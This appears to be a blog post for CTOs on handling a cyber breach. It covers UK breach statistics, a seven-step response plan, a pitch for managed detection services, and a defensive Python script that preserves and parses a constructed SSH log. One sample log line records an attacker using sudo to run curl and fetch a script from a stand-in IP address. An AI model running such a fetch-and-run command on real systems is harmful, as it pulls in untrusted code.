3 Dec 2022

You’re the CTO, you’ve had a cyber breach. What now?

As a tech leader, you will be no stranger to the threat of a cyber breach. You’ll be aware of the types of attack and the dangers they pose: business continuity, your customers and, almost certainly, the reputation of your department and your organisation will all be affected.

Chances are you’ll have an array of policies and precautions in place. Your staff are well trained; your firewalls, systems and software are fully up to date with the latest patches. You have installed current antivirus, intrusion detection and endpoint protection, and tightened admin rights, password and login policies in the face of increased remote working. You may already have cyber security insurance. And you’ll have ensured your data is backed up, should the worst happen.

And will the worst happen?

Highly likely. 39% of UK businesses identified at least one cyber attack in 2022*. Of these, the most common (83%) was a phishing attack. A smaller share identified more sophisticated attacks, such as denial of service, malware or ransomware.

[Chart: IT execs: "Cyber attacks on my organisation are an issue because..."]

Over 35% of these businesses experienced some form of operational impact. That included writing detailed reports and making provision for tighter security, diverting staff from other tasks, and repair and recovery costs.

It also included loss of goods or services, loss of reputation, revenue or share value. Add customer complaints and compensation, fines, legal costs and ransoms, and it all becomes a headache.

Our own research shows that disruption to operations was the biggest issue for tech executives after a cyber attack: simply the ability to serve customers, or for staff to complete projects. Note that the cost of ransom and repair was ranked only fourth.

For businesses that reported a material outcome after a cyber attack, nearly 40% took over 24 hours to recover, and 8% took up to a week.*

Assuming the worst has happened, what should you do?

You should already have a clear plan for responding to a cyber breach. Your staff should be trained, regularly updated, aware of your policies and given a clear roadmap to follow when a breach happens.

    1. Contain the breach and limit the damage. Isolate the affected systems from the rest of the network and disable remote access to them, but do not power them off or wipe them: a reboot destroys the memory-resident evidence that shows what the attacker was running. Do not delete data, and preserve every log you can reach (copy it elsewhere and record a hash of the copy) before anyone starts "cleaning up".
    2. Preserve evidence. You will need it to prevent a repeat attack, and the breach may have regulatory, customer-data and litigation consequences, so it may become necessary to present formal evidence once the incident is resolved. Keep a record of who collected what, and when.
    3. Determine the nature of the breach. Check security logs, firewalls and email. Your antivirus or intrusion detection system should hold some clues. Who had access to the affected servers? Which network connections were active at the time?
    4. Establish the scope of the breach. What data has been compromised: addresses, email accounts, passwords, card details? Is it confined to your business, or has it reached your customers, suppliers or partners? Who needs to be notified, and how quickly? You will probably have to write a report, and may face litigation if you have not taken the appropriate steps in time.
    5. If you have cyber liability insurance, notify your provider; they may also be able to help with post-event forensics.
    6. Restore. Once you have established how the attacker got in and fixed the part of your infrastructure that let them, you can bring systems back online. Notify all affected parties, and reset passwords and access privileges as appropriate, including any credentials the attacker could have read.
    7. Restrict the number of people with access to the affected systems so that a similar breach is harder to repeat. Prepare reports and examine which equipment or policy changes would limit the chances of a similar event in future.
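As an added example (not part of the original post), here is a small Python triage script for steps 1 to 4: it preserves a copy of a log with its SHA-256 recorded in a chain-of-custody manifest, then parses the log to answer who reached the host and from where in the suspected window, flags a source address whose failed logins were followed by a success, and lists the privileged commands that account ran. The auth log lines, the host name web01, the IP addresses and the collector name are all constructed for the example.

```python
"""Offline triage of an SSH auth log: preserve it, then ask who got in, from where."""
import hashlib
import json
import re
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Constructed sample in OpenSSH/syslog format (no year on the line). Not a real log.
SAMPLE_AUTH_LOG = """\
Dec  2 22:58:41 web01 sshd[4121]: Failed password for invalid user admin from 203.0.113.45 port 51002 ssh2
Dec  2 22:58:44 web01 sshd[4121]: Failed password for invalid user admin from 203.0.113.45 port 51002 ssh2
Dec  2 23:01:07 web01 sshd[4130]: Accepted password for deploy from 203.0.113.45 port 51377 ssh2
Dec  2 23:01:07 web01 sshd[4130]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Dec  2 23:02:15 web01 sudo:   deploy : TTY=pts/1 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.45/x.sh
Dec  3 08:15:02 web01 sshd[5201]: Accepted publickey for alice from 198.51.100.7 port 40210 ssh2
"""
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_AUTH_LOG.encode()).hexdigest()

SYSLOG_RE = re.compile(r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) (?P<rest>.*)$")
SSH_RE = re.compile(r"(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def preserve(src, evidence_dir, collector):
    """Step 1: copy the log and record its SHA-256, who collected it and when,
    before anyone reboots or 'cleans up' the host. Returns the manifest entry."""
    evidence_dir = Path(evidence_dir)
    evidence_dir.mkdir(parents=True, exist_ok=True)
    dst = evidence_dir / Path(src).name
    shutil.copy2(src, dst)  # copy2 keeps the original mtime, which is itself evidence
    entry = {"file": str(dst), "sha256": hashlib.sha256(dst.read_bytes()).hexdigest(),
             "collected_by": collector, "collected_at": datetime.now(timezone.utc).isoformat()}
    with (evidence_dir / "manifest.jsonl").open("a", encoding="utf-8") as f:
        f.write(json.dumps(entry) + "\n")
    return entry


def parse_auth_log(text, year):
    """Turn syslog lines into events with UTC timestamps. Syslog omits the year,
    so the caller supplies it; the log is assumed to be written in UTC."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                               "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
        s = SSH_RE.search(m["rest"])
        if s:
            events.append({"ts": ts, "host": m["host"], "kind": "ssh",
                           "outcome": s["outcome"].lower(), "user": s["user"], "ip": s["ip"]})
            continue
        u = SUDO_RE.search(m["rest"])
        if u:
            events.append({"ts": ts, "host": m["host"], "kind": "sudo", "outcome": "accepted",
                           "user": u["user"], "ip": None, "cmd": u["cmd"]})
    return events


def access_during(events, start, end):
    """Step 3: who reached the host, from where, and did they get in, within [start, end]."""
    return sorted({(e["user"], e["ip"], e["outcome"])
                   for e in events if e["kind"] == "ssh" and start <= e["ts"] <= end})


def failed_then_accepted(events):
    """Source IPs whose failed logins were later followed by a success: the
    signature of a password guess that worked, so the first thing to chase."""
    seen_failure, suspicious = set(), set()
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["kind"] != "ssh":
            continue
        if e["outcome"] == "failed":
            seen_failure.add(e["ip"])
        elif e["ip"] in seen_failure:
            suspicious.add(e["ip"])
    return sorted(suspicious)


def privileged_commands(events, user):
    """Step 4 starts here: what did the compromised account do as root?"""
    return [e["cmd"] for e in events if e["kind"] == "sudo" and e["user"] == user]


def triage_sample(work_dir=None):
    """Run the whole flow on the constructed log; returns what goes in the first report."""
    work_dir = Path(work_dir or tempfile.mkdtemp(prefix="triage-"))
    log = work_dir / "auth.log"
    log.write_bytes(SAMPLE_AUTH_LOG.encode())
    entry = preserve(log, work_dir / "evidence", "g.smith")  # collector name is made up
    events = parse_auth_log(SAMPLE_AUTH_LOG, 2022)
    window = (datetime(2022, 12, 2, 22, 0, tzinfo=timezone.utc),
              datetime(2022, 12, 3, 0, 0, tzinfo=timezone.utc))
    return {"evidence_sha256": entry["sha256"],
            "access": access_during(events, *window),
            "brute_forced_from": failed_then_accepted(events),
            "sudo_by_deploy": privileged_commands(events, "deploy")}


if __name__ == "__main__":
    print(json.dumps(triage_sample(), indent=2))
```

The hash in the manifest is what lets you later show a regulator or a court that the log you analysed is the log you collected; on a real host you would run the same preservation against every log source before touching the machine, and widen the parser to whatever formats those sources use.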

Consider a Managed Detection and Response (MDR) service. 58% of small firms and 55% of medium businesses now outsource their IT and cyber security to an external supplier*. The reasons organisations gave were access to greater expertise, more advanced resources and higher cyber security standards.

Outsourcing cybersecurity to an MSP

MDR providers are becoming an invaluable third-party asset to businesses of all sizes in every sector. These outsourced cyber security services can detect and respond to threats that your own security infrastructure may not have the resources or the skills to handle. Most MDR platforms provide 24/7 coverage, including cloud-based monitoring for organisations that struggle to staff a comprehensive security department of their own.

MDR services combine all aspects of a cybersecurity plan into one managed control centre. They maximise the effectiveness of threat monitoring and response without increasing internal resources. They reduce the need for security up-skilling and provide protection against emerging threats (some known and some unknown).

MDR services can also be provided on a monthly contract basis, streamlining your IT budget and avoiding the cost spikes and fiscal black holes that upgrades, staff churn and event response can cause.

Before you upgrade your cyber security infrastructure, consider how outsourcing to an MDR provider might help you maintain the end-to-end protection you need to secure your business and avoid the pitfalls of a cyber breach.

*Figures sourced from Gov.UK Cyber Security Breaches Survey 2022

By Graham Smith